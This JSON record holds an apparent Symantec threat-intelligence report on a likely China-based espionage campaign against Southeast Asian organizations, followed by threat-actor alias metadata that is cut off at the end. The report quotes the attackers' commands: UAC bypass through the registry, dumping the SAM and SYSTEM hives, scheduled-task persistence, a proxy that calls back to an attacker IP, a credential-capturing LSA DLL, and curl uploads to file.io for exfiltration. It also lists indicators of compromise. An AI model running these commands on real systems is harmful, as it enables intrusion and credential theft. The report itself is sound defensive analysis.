{
	"id": "6fd0fea3-eb31-4626-8a53-68775663e798",
	"created_at": "2026-04-06T00:13:44.517385Z",
	"updated_at": "2026-04-10T13:12:29.448143Z",
	"deleted_at": null,
	"sha1_hash": "9139a34107ab4cc3e506b55f7d2f2557f68b7e3e",
	"title": "Likely China-based Attackers Target High-profile Organizations in Southeast Asia",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 95719,
	"plain_text": "Likely China-based Attackers Target High-profile Organizations in Southeast Asia\r\nArchived: 2026-04-05 13:01:47 UTC\r\nThreat actors using tools linked to China-based APT groups have targeted multiple high-profile organizations in Southeast Asia, including government ministries in two different countries, an air traffic control organization, a telecoms company, and a media outlet.\r\nThe attacks, which have been underway since at least October 2023, appear to have intelligence gathering as their main goal. The attackers use a variety of both open-source and living-off-the-land tools in their operations.\r\nWhile attribution to a specific threat group cannot be determined, multiple tools used in the campaign have links to several China-based actors (see Tools section for details). Of note is the use of a proxy tool called Rakshasa and a legitimate application file used for DLL sideloading, both of which were used previously by the Chinese advanced persistent threat (APT) group known as Earth Baku (aka APT41, Brass Typhoon).\r\nA typical attack involves the use of a remote access tool that leverages Impacket to execute commands via WMI (Windows Management Instrumentation). The attackers then install keyloggers, password collectors, and reverse proxy tools (Rakshasa, Stowaway, ReverseSSH) to maintain connections to attacker-controlled infrastructure. The threat actors also install customized DLL files that act as authentication mechanism filters, allowing them to intercept login credentials.\r\nTools\r\nThe threat actors used the following tools. However, the list of tools used in each attack varied and not all of the following were used in every attack.\r\nDismap: An open-source asset discovery and identification tool.\r\nFastReverseProxy: FRP is an open-source tool used to expose local servers to the public internet.\r\nfile.io exfiltration: Commands used by the attackers suggest that data gathered during a successful attack is exfiltrated to the legitimate file-sharing website file.io.\r\nImpacket: An open-source collection of modules written in Python for programmatically constructing and manipulating network protocols. It contains several tools for remote service execution, Kerberos manipulation, Windows credential dumping, packet sniffing, and relay attacks.\r\nInfostealer: An information-collection tool that creates a hidden folder named AppCache and a file named AppCache.dat at C:\\Users\\[CURRENT USER]\\AppData\\Local\\Microsoft\\Windows\\AppCache\\AppCache.dat. It then encrypts and logs gathered information into AppCache.dat.\r\nhttps://www.security.com/threat-intelligence/china-southeast-asia-espionage\r\nPage 1 of 9\r\nInveigh: A cross-platform .NET IPv4/IPv6 machine-in-the-middle tool for penetration testers. The tool can be used to conduct spoofing attacks and hash/credential captures through both packet sniffing and protocol-specific listeners/sockets.\r\nKeylogger: The attackers install customized DLL files that act as authentication mechanism filters, effectively allowing them to intercept login credentials from users who physically log in to the machine.\r\nLegitimate applications abused for DLL sideloading: The attackers used a legitimate application file (Bitdefender Crash Handler) from 2011 for DLL sideloading. This file was used previously in multiple attacks, some of which were linked to the Chinese APT group known as Earth Baku (aka APT41, Brass Typhoon).\r\nLiving off the land: The attackers also made use of several living-off-the-land tools, including:\r\nPowerShell: Microsoft scripting tool that can be used to run commands, download payloads, traverse compromised networks, and carry out reconnaissance.\r\nReg.exe: Windows command-line tool that can be used to edit the registry of local or remote computers.\r\nWMI (Windows Management Instrumentation): Microsoft command-line tool that can be used to execute commands on remote computers.\r\nNBTScan: An open-source command-line NetBIOS scanner.\r\nPlugX (Korplug): A remote access Trojan (RAT) that can download additional plugins to enhance its capability beyond information gathering. The malware was initially associated solely with multiple Chinese state-backed threat actors, including Budworm (aka APT27, Emissary Panda, Lucky Mouse) and Fireant (aka Mustang Panda, APT31, Stately Taurus). However, a range of other threat actors outside of China have used the malware since its source code was allegedly leaked in 2015.\r\nRakshasa: A proxy tool written in Go, designed specifically for multi-level proxying and internal network penetration. The tool has been used previously by Earth Baku. In addition, the language used in the tool is simplified Chinese.\r\nReverseSSH: A statically linked SSH server with reverse shell functionality.\r\nSharpGPOAbuse: A .NET application written in C# that can be used to take advantage of a user's edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.\r\nSharpNBTScan: A NetBIOS scanning tool written in C#. The tool was used previously by the China-linked APT group known as Fireant (aka Mustang Panda, APT31, Stately Taurus).\r\nStowaway Proxy Tool: A publicly available multi-hop proxy tool that allows users to easily proxy their network traffic to intranet nodes.\r\nTightVNC: Open-source remote desktop software.\r\nWinRAR: An archive manager that can be used to archive or zip files – for example, prior to exfiltration.\r\nAttack timeline\r\nThe following activity occurred on one of the targeted organizations’ networks. In this instance, the attackers remained active for at least three months, between June and August 2024, focusing on intelligence gathering—specifically collecting and likely exfiltrating data of interest. While this case highlights a particular approach, in other attacks the threat actors employed additional tactics, techniques, and procedures (TTPs), such as DLL sideloading, and leveraged tools like Rakshasa and SharpGPOAbuse, among others, to achieve their objectives.\r\nMachine 1\r\nThe first indication of malicious activity within this organization was on May 27 at 14:15 local time, when a suspicious PowerShell command was executed. The command was used to modify the registry, specifically the system policies, to enable 'LocalAccountTokenFilterPolicy'. This value controls how local accounts are filtered when they are used to access a Windows system remotely. Setting it to '1' effectively disables Remote UAC filtering for local accounts, allowing local admin accounts to use elevated tokens (with full admin rights when connecting remotely).\r\nAt 14:18, another suspicious command was executed via the WMI service:\r\ncmd.exe /Q /c cd \\ 1\u003e \\\\127.0.0.1\\ADMIN$\\__1716819456.018484 2\u003e\u00261\r\nThis pipe naming convention typically indicates that a remote tool leveraging Impacket is being used to execute the commands (also corroborated via process lineage). This is a common command observed as part of tooling used in lateral movement, such as wmiexec.\r\nAt 14:22, several additional discovery commands were executed:\r\nnetsh wlan show profiles\r\nnet share\r\nnetstat -abnop tcp\r\nThe netsh command was used to display wireless network profile information, including network names for any wireless network that was connected to in the past. The net share command lists any available network shares. The netstat command lists all active (established and listening) TCP connections on the machine.\r\nThe next day, May 28 at 12:51, another suspicious command was executed via WMI:\r\ncmd.exe /Q /c move ChromeUpdate.dat ChromeUpdate.exe 1\u003e \\\\127.0.0.1\\ADMIN$\\__1716900555.2954416 2\u003e\u00261\r\nThe command was used to rename a likely uploaded file called ChromeUpdate.dat (SHA-256: 8b6d081be732743aa6f6bccfb68b3f21878aa36723c1311f50406d752aacc9fa) to ChromeUpdate.exe.\r\nNext, the file was executed, passing 'install' as a command-line argument:\r\nChromeUpdate.exe /install\r\nThe file contained an encrypted embedded keylogger payload for 64-bit systems.\r\nAt 13:07, several suspicious registry edits and scheduled task-related commands were executed:\r\nreg add hklm\\software\\microsoft\\windows\\CurrentVersion\\run /v mscorsvc /t REG_EXPAND_SZ /d \"\\\"CSIDL_PROGRAM_FILESX86\\microsoft.net\\redistlist\\mscorsvw.exe\"\" /f\r\nschtasks /create /sc once /st 23:59 /ru \"[REMOVED]\" /tn autorun /tr \"CSIDL_PROGRAM_FILESX86\\microsoft.net\\redistlist\\mscorsvw.exe\" /F\r\nschtasks /run /tn autorun\r\nThese commands were used to create a run key for a file called mscorsvw.exe in the registry using the run key name 'mscorsvc' – this will launch the file every time the system boots. The schtasks command creates a scheduled task called 'autorun' under the user '[REMOVED]', configured to run only once at 23:59 on the same day. Directly after this, schtasks was executed to launch the autorun task (i.e. mscorsvw.exe).\r\nAt 13:13, another scheduled task was created for a different file:\r\nschtasks /create /sc once /st 23:59 /ru \"[REMOVED]\" /tn autorun /tr \"CSIDL_SYSTEMX86\\wbem\\wintulxs.exe -c 38.60.146.78:443 -s 1qaz2wsx4rfv -reconnect 10\" /F\r\nThis task was scheduled to run once at 23:59 on the same day using the task name 'autorun' to execute a file called 'wintulxs.exe' (SHA-256: d312b0e1968beae5a2ff3be2d8efc6d1bfdab3b1aec6faf8eafa295c47230194). This tool is a freely available Chinese proxy tool called Stowaway, which is described as providing the ability to “proxy external traffic through multiple nodes to the core internal network, breaking through internal network access restrictions.”\r\nOn May 30 at 03:16, the attackers returned and executed a series of ‘net’ commands to list network share sessions and available shares, and to view available shares on remote hosts. The attackers also mounted network shares. Directly afterwards, the ‘fsutil’ command was executed to list all available file system drives (e.g. C:).\r\nnet session\r\nnet share\r\nnet view\r\nnet view \\\\192.168.21.65\r\nnet use [REMOVED]\\\\192.168.21.108/u:[REMOVED]\r\nnet use [REMOVED]/d/y\r\nnet use [REMOVED]\\\\192.168.21.61/u:[REMOVED]\r\nfsutil fsinfo drives\r\nMachine 2\r\nAt the time of the initial attacker activity on May 27 at 13:41, additional suspicious activity was also observed on another machine. Similar commands to those previously observed were executed as a means to bypass UAC. This time, the commands were executed via TightVNC.\r\nnet user [REMOVED]\r\nreg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f\r\nnet localgroup [REMOVED] [REMOVED] /add\r\nreg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f\r\nAt 15:08, another suspicious reg.exe command was executed:\r\n\"CSIDL_SYSTEM\\reg.exe\" add \"hklm\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\" /v [REMOVED] /t REG_DWORD /d 0 /f\r\nThis command was used to modify the Windows registry, specifically to hide a specific account from the user list displayed at login.\r\nShortly after, at 15:10, the attackers returned and dumped passwords from the registry:\r\ncmd.exe /Q /c cd 1\u003e \\\\127.0.0.1\\ADMIN$\\__1716822622.7074058 2\u003e\u00261\r\nreg save hklm\\sam sam.hive\r\nreg save hklm\\system system.hive\r\ncmd.exe /Q /c dir /on CSIDL_PROGRAM_FILES\\winrar\\rar.exe 1\u003e \\\\127.0.0.1\\ADMIN$\\__1716822622.7074058 2\u003e\u00261\r\nThe attackers also checked that WinRAR was installed in the default path, likely intending to use it to collect and later exfiltrate the hive files.\r\nOn May 28 at 13:51, the attackers used WMI to launch a command prompt.\r\nThe next day at 13:52, the attackers returned and copied an unknown file that masquerades as part of the .NET framework:\r\nCSIDL_WINDOWS\\microsoft.net\\framework\\v4.0.30319\\mscorsvw.exe → CSIDL_SYSTEM_DRIVE\\progra~2\\microsoft.net\\redistlist\\mscorsvw.exe\r\nDirectly after this, the attackers proceeded to create registry run keys and scheduled a task to execute the sample at 23:59:\r\nreg add hklm\\software\\microsoft\\windows\\CurrentVersion\\run /v mscorsvc /t REG_EXPAND_SZ /d \"\\\"CSIDL_PROGRAM_FILESX86\\microsoft.net\\redistlist\\mscorsvw.exe\"\" /f\r\nschtasks /create /sc once /st 23:59 /ru \"[REMOVED]\" /tn autorun /tr \"CSIDL_PROGRAM_FILESX86\\microsoft.net\\redistlist\\mscorsvw.exe\" /F\r\nschtasks /run /tn autorun\r\nFinally, the attackers used schtasks to launch the autorun task, executing mscorsvw.exe.\r\nMachine 3\r\nLater, on August 20, the attackers installed a ReverseSSH tool – winupdateser.exe (SHA-256: 779b4a5f53d3128ab53dd8e13c362d6d077c3eb4987f878d7ef3416c801ef0dd).\r\nFollowing this, at 07:32, the attackers created a scheduled task on a remote system to execute an unknown Windows batch file (net.bat) at 15:35 using the task name 'Microsoft\\windows\\TaskScheduler\\Maintenance':\r\nschtasks /create /s [REMOVED] /u [REMOVED] /p [REMOVED] /tn \"Microsoft\\windows\\TaskScheduler\\Maintenance\" /tr \"CSIDL_SYSTEM\\net.bat\" /sc once /st 15:35\r\nShortly afterward, WMI was used to execute ‘ChromeUpdate.exe /install’ in order to install a keylogger.\r\nAt 08:11, WMI was used to execute ‘ipconfig /all \u003e\u003e %TEMP%\\cc.dat’ to collect network configuration information.\r\nOn September 4, the attackers returned and created multiple scheduled tasks to execute unknown Windows batch files using the task name 'Microsoft\\windows\\TaskScheduler\\Maintenance' on multiple machines:\r\nschtasks /create /s [REDACTED] /u [REMOVED] /p [REMOVED] /tn \"Microsoft\\windows\\TaskScheduler\\Maintenance\" /tr \"CSIDL_WINDOWS\\temp\\[REDACTED]udpate.bat\" /sc once /st 15:58\r\nMachine 4\r\nOn August 6 at 12:21, the attackers accessed another machine where they executed a script (ime.bat) in order to install a new authentication mechanism called Win32Pro:\r\necho off\r\nreg add HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Kerberos /v Auth0 /t REG_SZ /d\"Win32Pro\"/f \u003e\u003ec:\\windows\\ime\\ime.log\r\nREG QUERY\"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\"/v\"Notification Packages\"\u003e\u003ec:\\windows\\ime\\ime.log\r\nREG QUERY \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\"/v\"Security Packages\"\u003e\u003ec:\\windows\\ime\\ime.log\r\ndel %0\r\nFollowing the installation, the attackers launched a file named ‘win32pro.dll’ (SHA-256: 89707a5bf9862a9effb1618a1a285a8d027fb343f6103f4bc68f736889f0a86e) via another file called rpc2.exe (SHA-256: e0f3b8028a2969e280efdd770978a54181fc242dd26cbf0a22e922f1e6a1b951).\r\nCSIDL_SYSTEM\\rpc2.exe CSIDL_SYSTEM\\win32pro.dll\r\nThe file ‘win32pro.dll’ was used to capture and collect user login information including the current time, domain name, username, machine name, and password. Captured credentials were stored in the following locations, encrypted using the RC4 algorithm with the key \"rfvfsj\":\r\nc:\\windows\\system32\\normcache.nls\r\nC:\\Windows\\SYSVOL\\domain\\Policies\\{6AC1786C-016F-11D2-945F-00C04fB984F9}\\MACHINE\\Microsoft\\caches.db\r\nExfiltration activities\r\nDuring the course of these operations, the attackers conducted exfiltration activities within targeted organizations. They maintained prolonged access to these networks, often spanning several months, while operating covertly to avoid detection.\r\nDuring this time, they focused on harvesting credentials, including passwords, and mapping the network to identify systems of interest.\r\nExfiltration was carried out through a combination of tactics, including the collection of files of interest using WinRAR, which were subsequently compressed into password-protected archives. These archives were then uploaded to cloud storage services such as File.io, enabling the attackers to stealthily exfiltrate sensitive data while minimizing the risk of exposure. This extended dwell time and calculated approach underscore the sophistication and persistence of the threat actors.\r\nCSIDL_SYSTEM\\cmd.exe /c CSIDL_SYSTEM_DRIVE\\program files\\winrar\\rar.exe a -k -r -s -m5 -v100M \"CSIDL_PROFILE\\public\\downloads\\m1.rar\" c:\\users\\public\\downloads\\*.csv\r\nCSIDL_SYSTEM\\cmd.exe /c CSIDL_SYSTEM_DRIVE\\program files\\winrar\\rar.exe a -k -r -s -m5 -v100M \"CSIDL_PROFILE\\public\\downloads\\m2.rar\" C:\\windows\\temp\\Netwrix-Report-20240312112337\\csv-files\\*.csv\r\nCSIDL_SYSTEM\\cmd.exe /c CSIDL_SYSTEM_DRIVE\\program files\\winrar\\rar.exe a -k -r -s -m5 -v100M -hp@1232ws \"CSIDL_PROFILE\\public\\downloads\\m3.rar\" CSIDL_PROFILE\\public\\downloads\\[REMOVED]_sdulog.zip\r\nCSIDL_SYSTEM\\cmd.exe /c CSIDL_SYSTEM_DRIVE\\program files\\winrar\\rar.exe a -k -r -s -m5 -v100M -hp@1232ws \"CSIDL_PROFILE\\public\\downloads\\m4.rar\" \\\\[REMOVED]\\logs$\\Users\\*.csv\r\nCSIDL_SYSTEM\\cmd.exe /c CSIDL_SYSTEM_DRIVE\\program files\\winrar\\rar.exe a -k -r -s -m5 -v100M -hp@1232ws \"CSIDL_PROFILE\\public\\downloads\\m5.rar\" \\\\[REMOVED]\\logs$\\Computers\\*.csv\r\ncurl -k -F \"file=@c:\\users\\public\\[REMOVED]_sdulog.zip\" https://file.io\r\ncurl -k -F \"file=@c:\\users\\public\\downloads\\m3.rar\" https://file.io\r\nAttribution\r\nWhile the attackers in this campaign used a wide selection of TTPs that differed slightly between targeted organizations, the geographical location of targeted organizations, as well as the use of tools linked previously to China-based APT groups, suggests that this activity is the work of China-based actors.\r\nTools leveraged in these attacks have been used by Chinese state-backed groups such as Fireant (aka Mustang Panda, APT31, Stately Taurus), Earth Baku (aka APT41, Brass Typhoon), Budworm (aka APT27, Emissary Panda, Lucky Mouse), and others. However, because many of these groups frequently share tools and use similar TTPs, specific attribution in this case is not possible.\r\nProtection/Mitigation\r\nFor the latest protection updates, please visit the Symantec Protection Bulletin.\r\nIndicators of Compromise\r\nIf an IOC is malicious and the file is available to us, Symantec Endpoint products will detect and block that file.\r\nd312b0e1968beae5a2ff3be2d8efc6d1bfdab3b1aec6faf8eafa295c47230194 – Stowaway\r\ne0f3b8028a2969e280efdd770978a54181fc242dd26cbf0a22e922f1e6a1b951 – Loader\r\n33cb9f06338a9ea17107abbdc478071bbe097f80a835bbac462c4bb17cd0b798 – PlugX loader\r\n8b6d081be732743aa6f6bccfb68b3f21878aa36723c1311f50406d752aacc9fa – Keylogger\r\n89707a5bf9862a9effb1618a1a285a8d027fb343f6103f4bc68f736889f0a86e – Keylogger\r\n9fe3ff51443c41fe0be01a55a3a5fbfb261bcf63b3b0cd67f65a2c00a6d52ff3 – Keylogger\r\ne6cecba25abd092bfccba825298edecd2fdee6c428d9ae85399fabc54355e31f – Keylogger loader\r\n779b4a5f53d3128ab53dd8e13c362d6d077c3eb4987f878d7ef3416c801ef0dd – ReverseSSH\r\ne9572549b2f35f32861ffc9be160e9c8f86e4d9d3dd43c3727f0df4dc2acc944 – Infostealer\r\nb7472c6f6cba47ec85fa147c78f3a7a40a4fc5913fe41654ab499a7b1bd4ea2e – Batch file used to register custom DLL to hook into Windows authentication mechanisms\r\n3e4d86c4e1d463b99478f960c9c00f7d11cd0d1fb8dd2948e8340b7bc3550904 – Batch file used to register custom DLL to hook into Windows authentication mechanisms\r\nfb603072418da9150673ac9826a46a2b2462c8fc0afeacb2034ecb2b7d666001 – Batch file used to register custom DLL to hook into Windows authentication mechanisms\r\n340e872c814d221989ca2cb93819b9ad307572851b5b3f8bfcf791ff08e0e677 – Suspicious Windows script file\r\n80c3effc8f017b26c549bed8ba82097a6be7a59e383dd35adc917bf661e0a754 – Windows script file that drops SharpGPOAbuse and Rakshasa\r\n9b1794a1c8c59631d95178c7c4e2f5917b84864b342b4cfdab8f0990c3dbf5d2 – FastReverseProxy\r\nca0eeb4b71d4124dec785a9492970e9b1cfaa4cab0e8ca4486fc14b2e256d7f7 – Inveigh\r\nd7b85b92fb185272b89a7ff27424bff22a5a6542f6bde9838482aa9f87979828 – Dismap\r\nfa6de0d0bc9d83a3942aa8b3a12a5924dc662bec32cb3c2f212a0a0c0a4ebc7a – SharpNbtscan\r\n10029f14f2718362144b0e9b660994e8fb944af9ce9fcff04925f8b0615bb509 – SharpGPOAbuse\r\naa096f18e712ac0604e18d16441b672fcb393de9edf3ff4393519c48ab26a158 – Rakshasa\r\n386eb7aa33c76ce671d6685f79512597f1fab28ea46c8ec7d89e58340081e2bd – Bitdefender Crash Handler (2011)\r\n38.60.146[.]78:443 – Stowaway\r\n118.107.219[.]66:443 – Stowaway\r\n45.123.188[.]180 – FastReverseProxy\r\n198.244.237[.]131 – Rakshasa download\r\nSource: https://www.security.com/threat-intelligence/china-southeast-asia-espionage",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.security.com/threat-intelligence/china-southeast-asia-espionage"
	],
	"report_names": [
		"china-southeast-asia-espionage"
	],
	"threat_actors": [
		{
			"id": "93542ae8-73cb-482b-90a3-445a20663f15",
			"created_at": "2022-10-25T16:07:24.058412Z",
			"updated_at": "2026-04-10T02:00:04.853499Z",
			"deleted_at": null,
			"main_name": "PKPLUG",
			"aliases": [
				"Stately Taurus"
			],
			"source_name": "ETDA:PKPLUG",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "49822165-5541-423d-8808-1c0a9448d588",
			"created_at": "2022-10-25T16:07:23.384093Z",
			"updated_at": "2026-04-10T02:00:04.575678Z",
			"deleted_at": null,
			"main_name": "Barium",
			"aliases": [
				"Brass Typhoon",
				"Pigfish",
				"Starchy Taurus"
			],
			"source_name": "ETDA:Barium",
			"tools": [
				"Agent.dhwf",
				"Agentemis",
				"Barlaiy",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"Destroy RAT",
				"DestroyRAT",
				"Kaba",
				"Korplug",
				"POISONPLUG",
				"PlugX",
				"RbDoor",
				"RedDelta",
				"RibDoor",
				"Sogu",
				"TIGERPLUG",
				"TVT",
				"Thoper",
				"Winnti",
				"Xamtrav",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "aacd5cbc-604b-4b6e-9e58-ef96c5d1a784",
			"created_at": "2023-01-06T13:46:38.953463Z",
			"updated_at": "2026-04-10T02:00:03.159523Z",
			"deleted_at": null,
			"main_name": "APT31",
			"aliases": [
				"JUDGMENT PANDA",
				"BRONZE VINEWOOD",
				"Red keres",
				"Violet Typhoon",
				"TA412"
			],
			"source_name": "MISPGALAXY:APT31",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e3492534-85a6-4c87-a754-5ae4a56d7c8c",
			"created_at": "2022-10-25T15:50:23.819113Z",
			"updated_at": "2026-04-10T02:00:05.354598Z",
			"deleted_at": null,
			"main_name": "Threat Group-3390",
			"aliases": [
				"Threat Group-3390",
				"Earth Smilodon",
				"TG-3390",
				"Emissary Panda",
				"BRONZE UNION",
				"APT27",
				"Iron Tiger",
				"LuckyMouse",
				"Linen Typhoon"
			],
			"source_name": "MITRE:Threat Group-3390",
			"tools": [
				"Systeminfo",
				"gsecdump",
				"PlugX",
				"ASPXSpy",
				"Cobalt Strike",
				"Mimikatz",
				"Impacket",
				"gh0st RAT",
				"certutil",
				"China Chopper",
				"HTTPBrowser",
				"Tasklist",
				"netstat",
				"SysUpdate",
				"HyperBro",
				"ZxShell",
				"RCSession",
				"ipconfig",
				"Clambling",
				"pwdump",
				"NBTscan",
				"Pandora",
				"Windows Credential Editor"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "9e6186dd-9334-4aac-9957-98f022cd3871",
			"created_at": "2022-10-25T15:50:23.357398Z",
			"updated_at": "2026-04-10T02:00:05.368552Z",
			"deleted_at": null,
			"main_name": "ZIRCONIUM",
			"aliases": [
				"APT31",
				"Violet Typhoon"
			],
			"source_name": "MITRE:ZIRCONIUM",
			"tools": null,
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "b69037ec-2605-4de4-bb32-a20d780a8406",
			"created_at": "2023-01-06T13:46:38.790766Z",
			"updated_at": "2026-04-10T02:00:03.101635Z",
			"deleted_at": null,
			"main_name": "MUSTANG PANDA",
			"aliases": [
				"Stately Taurus",
				"LuminousMoth",
				"TANTALUM",
				"Twill Typhoon",
				"TEMP.HEX",
				"Earth Preta",
				"Polaris",
				"BRONZE PRESIDENT",
				"HoneyMyte",
				"Red Lich",
				"TA416"
			],
			"source_name": "MISPGALAXY:MUSTANG PANDA",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "c7d9878a-e691-4c6f-81ae-84fb115a1345",
			"created_at": "2022-10-25T16:07:23.359506Z",
			"updated_at": "2026-04-10T02:00:04.556639Z",
			"deleted_at": null,
			"main_name": "APT 41",
			"aliases": [
				"BrazenBamboo",
				"Bronze Atlas",
				"Double Dragon",
				"Earth Baku",
				"G0096",
				"Grayfly",
				"Operation ColunmTK",
				"Operation CuckooBees",
				"Operation ShadowHammer",
				"Red Kelpie",
				"SparklingGoblin",
				"TA415",
				"TG-2633"
			],
			"source_name": "ETDA:APT 41",
			"tools": [
				"9002 RAT",
				"ADORE.XSEC",
				"ASPXSpy",
				"ASPXTool",
				"AceHash",
				"Agent.dhwf",
				"Agentemis",
				"AndroidControl",
				"AngryRebel",
				"AntSword",
				"BLUEBEAM",
				"Barlaiy",
				"BlackCoffee",
				"Bladabindi",
				"BleDoor",
				"CCleaner Backdoor",
				"CHINACHOPPER",
				"COLDJAVA",
				"China Chopper",
				"ChyNode",
				"Cobalt Strike",
				"CobaltStrike",
				"Crackshot",
				"CrossWalk",
				"CurveLast",
				"CurveLoad",
				"DAYJOB",
				"DBoxAgent",
				"DEADEYE",
				"DEADEYE.APPEND",
				"DEADEYE.EMBED",
				"DEPLOYLOG",
				"DIRTCLEANER",
				"DUSTTRAP",
				"Derusbi",
				"Destroy RAT",
				"DestroyRAT",
				"DodgeBox",
				"DragonEgg",
				"ELFSHELF",
				"EasyNight",
				"Farfli",
				"FunnySwitch",
				"Gh0st RAT",
				"Ghost RAT",
				"HDD Rootkit",
				"HDRoot",
				"HKDOOR",
				"HOMEUNIX",
				"HUI Loader",
				"HidraQ",
				"HighNoon",
				"HighNote",
				"Homux",
				"Hydraq",
				"Jorik",
				"Jumpall",
				"KEYPLUG",
				"Kaba",
				"Korplug",
				"LATELUNCH",
				"LOLBAS",
				"LOLBins",
				"LightSpy",
				"Living off the Land",
				"Lowkey",
				"McRAT",
				"MdmBot",
				"MessageTap",
				"Meterpreter",
				"Mimikatz",
				"MoonBounce",
				"MoonWalk",
				"Motnug",
				"Moudour",
				"Mydoor",
				"NTDSDump",
				"PACMAN",
				"PCRat",
				"PINEGROVE",
				"PNGRAT",
				"POISONPLUG",
				"POISONPLUG.SHADOW",
				"POTROAST",
				"PRIVATELOG",
				"PipeMon",
				"PlugX",
				"PortReuse",
				"ProxIP",
				"ROCKBOOT",
				"RbDoor",
				"RedDelta",
				"RedXOR",
				"RibDoor",
				"Roarur",
				"RouterGod",
				"SAGEHIRE",
				"SPARKLOG",
				"SQLULDR2",
				"STASHLOG",
				"SWEETCANDLE",
				"ScrambleCross",
				"Sensocode",
				"SerialVlogger",
				"ShadowHammer",
				"ShadowPad Winnti",
				"SinoChopper",
				"Skip-2.0",
				"SneakCross",
				"Sogu",
				"Speculoos",
				"Spyder",
				"StealthReacher",
				"StealthVector",
				"TERA",
				"TIDYELF",
				"TIGERPLUG",
				"TOMMYGUN",
				"TVT",
				"Thoper",
				"Voldemort",
				"WIDETONE",
				"WINNKIT",
				"WINTERLOVE",
				"Winnti",
				"WyrmSpy",
				"X-Door",
				"XDOOR",
				"XMRig",
				"XShellGhost",
				"Xamtrav",
				"ZXShell",
				"ZoxPNG",
				"certutil",
				"certutil.exe",
				"cobeacon",
				"gresim",
				"njRAT",
				"pwdump",
				"xDll"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "4d5f939b-aea9-4a0e-8bff-003079a261ea",
			"created_at": "2023-01-06T13:46:39.04841Z",
			"updated_at": "2026-04-10T02:00:03.196806Z",
			"deleted_at": null,
			"main_name": "APT41",
			"aliases": [
				"WICKED PANDA",
				"BRONZE EXPORT",
				"Brass Typhoon",
				"TG-2633",
				"Leopard Typhoon",
				"G0096",
				"Grayfly",
				"BARIUM",
				"BRONZE ATLAS",
				"Red Kelpie",
				"G0044",
				"Earth Baku",
				"TA415",
				"WICKED SPIDER",
				"HOODOO",
				"Winnti",
				"Double Dragon"
			],
			"source_name": "MISPGALAXY:APT41",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e698860d-57e8-4780-b7c3-41e5a8314ec0",
			"created_at": "2022-10-25T15:50:23.287929Z",
			"updated_at": "2026-04-10T02:00:05.329769Z",
			"deleted_at": null,
			"main_name": "APT41",
			"aliases": [
				"APT41",
				"Wicked Panda",
				"Brass Typhoon",
				"BARIUM"
			],
			"source_name": "MITRE:APT41",
			"tools": [
				"ASPXSpy",
				"BITSAdmin",
				"PlugX",
				"Impacket",
				"gh0st RAT",
				"netstat",
				"PowerSploit",
				"ZxShell",
				"KEYPLUG",
				"LightSpy",
				"ipconfig",
				"sqlmap",
				"China Chopper",
				"ShadowPad",
				"MESSAGETAP",
				"Mimikatz",
				"certutil",
				"njRAT",
				"Cobalt Strike",
				"pwdump",
				"BLACKCOFFEE",
				"MOPSLED",
				"ROCKBOOT",
				"dsquery",
				"Winnti for Linux",
				"DUSTTRAP",
				"Derusbi",
				"ftp"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "2a24d664-6a72-4b4c-9f54-1553b64c453c",
			"created_at": "2025-08-07T02:03:24.553048Z",
			"updated_at": "2026-04-10T02:00:03.787296Z",
			"deleted_at": null,
			"main_name": "BRONZE ATLAS",
			"aliases": [
				"APT41 ",
				"BARIUM ",
				"Blackfly ",
				"Brass Typhoon",
				"CTG-2633",
				"Earth Baku ",
				"GREF",
				"Group 72 ",
				"Red Kelpie ",
				"TA415 ",
				"TG-2633 ",
				"Wicked Panda ",
				"Winnti"
			],
			"source_name": "Secureworks:BRONZE ATLAS",
			"tools": [
				"Acehash",
				"CCleaner v5.33 backdoor",
				"ChinaChopper",
				"Cobalt Strike",
				"DUSTPAN",
				"Dicey MSDN",
				"Dodgebox",
				"ForkPlayground",
				"HUC Proxy Malware (Htran)"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "6daadf00-952c-408a-89be-aa490d891743",
			"created_at": "2025-08-07T02:03:24.654882Z",
			"updated_at": "2026-04-10T02:00:03.645565Z",
			"deleted_at": null,
			"main_name": "BRONZE PRESIDENT",
			"aliases": [
				"Earth Preta ",
				"HoneyMyte ",
				"Mustang Panda ",
				"Red Delta ",
				"Red Lich ",
				"Stately Taurus ",
				"TA416 ",
				"Temp.Hex ",
				"Twill Typhoon "
			],
			"source_name": "Secureworks:BRONZE PRESIDENT",
			"tools": [
				"BlueShell",
				"China Chopper",
				"Claimloader",
				"Cobalt Strike",
				"HIUPAN",
				"ORat",
				"PTSOCKET",
				"PUBLOAD",
				"PlugX",
				"RCSession",
				"TONESHELL",
				"TinyNote"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "c63ab035-f9f2-4723-959b-97a7b98b5942",
			"created_at": "2023-01-06T13:46:38.298354Z",
			"updated_at": "2026-04-10T02:00:02.917311Z",
			"deleted_at": null,
			"main_name": "APT27",
			"aliases": [
				"BRONZE UNION",
				"Circle Typhoon",
				"Linen Typhoon",
				"TEMP.Hippo",
				"Budworm",
				"Lucky Mouse",
				"G0027",
